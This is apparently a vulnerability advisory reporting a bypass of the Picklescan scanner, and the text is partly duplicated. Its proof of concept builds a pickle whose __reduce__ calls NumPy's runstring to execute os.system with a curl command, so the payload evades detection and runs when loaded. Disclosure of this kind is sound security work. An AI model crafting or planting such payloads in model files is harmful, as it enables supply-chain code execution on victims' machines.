Summary
An unsafe deserialization vulnerability in Python’s pickle module allows an attacker to bypass static analysis tools like Picklescan and execute arbitrary code during deserialization. This can be exploited by import some built-in function in Numpy library that indrectly call some dangerous function like exec() to execute some python code as a parameter, which the attacker can import dangerous library inside like os library and execute arbitrary OS commands.
Details
Pickle’s deserialization process is known to allow execution of function via reduce method. While Picklescan is meant to detect such exploits, this attack evades detection by calling function in Numpy library that call dangerous function like exec(). And since Numpy library wasn't inside unsafe globals blacklist, it may not raise red flag in the security scan.
The attack payload executes in the following steps:
- First, the attacker craft the payload by import runstring function in numpy.testing._private.utils
- Then, inside reduce method, the attacker import dangerous libarary like os and calling os.system() to run OS commands, for example: curl command. And then the attacker send this malicious pickle file to the victim.
- Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.
PoC
import pickle
import torch
import pickle
from picklescan.scanner import scan_file_path
class Payload:
def __reduce__(self):
from numpy.testing._private.utils import runstring
return runstring, ("import os; os.system('curl https://example.com')",{})
def create_payload():
with open('payload.pickle', 'wb') as f:
pickle.dump(Payload(), f)
def load_payload():
result = scan_file_path('payload.pickle')
if result.infected_files != 0 or result.scan_err:
print('File is infected')
else:
print('File is clean')
with open('payload.pickle', 'rb') as f:
pickle.load(f)
create_payload()
load_payload()
Impact
Severity: High
Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. For example, Invoke-AI repository (https://github.com/invoke-ai/InvokeAI)
What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.
Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.
Recommended Fixes:
I suggest adding Numpy library to the unsafe globals blacklist.
Summary
An unsafe deserialization vulnerability in Python’s pickle module allows an attacker to bypass static analysis tools like Picklescan and execute arbitrary code during deserialization. This can be exploited by import some built-in function in Numpy library that indrectly call some dangerous function like exec() to execute some python code as a parameter, which the attacker can import dangerous library inside like os library and execute arbitrary OS commands.
Details
Pickle’s deserialization process is known to allow execution of function via reduce method. While Picklescan is meant to detect such exploits, this attack evades detection by calling function in Numpy library that call dangerous function like exec(). And since Numpy library wasn't inside unsafe globals blacklist, it may not raise red flag in the security scan.
The attack payload executes in the following steps:
PoC
Impact
Severity: High
Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. For example, Invoke-AI repository (https://github.com/invoke-ai/InvokeAI)
What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.
Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.
Recommended Fixes:
I suggest adding Numpy library to the unsafe globals blacklist.